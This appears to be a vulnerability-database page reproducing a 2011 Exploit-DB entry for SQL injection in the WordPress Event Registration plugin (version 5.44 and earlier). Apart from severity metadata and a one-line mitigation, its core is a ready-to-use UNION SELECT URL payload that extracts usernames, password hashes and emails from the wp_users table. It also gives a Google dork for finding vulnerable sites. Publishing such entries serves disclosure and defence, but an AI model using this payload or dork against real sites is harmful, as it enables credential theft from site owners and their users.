header-logo
Suggest Exploit
vendor:
Wordpress Event Registration plugin
by:
serk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Wordpress Event Registration plugin
Affected Version From: <= 5.44
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

WordPress Event Registration plugin <= 5.44 SQl Injection Vulnerability

The exploit allows an attacker to perform SQL injection by manipulating the 'event_id' parameter in the URL.

Mitigation:

Update to a version higher than 5.44 or apply a patch if available. Ensure user input is properly sanitized and validated.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44


[ exploit ]

domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--

Navigation

Suggest Exploit

Services By CQR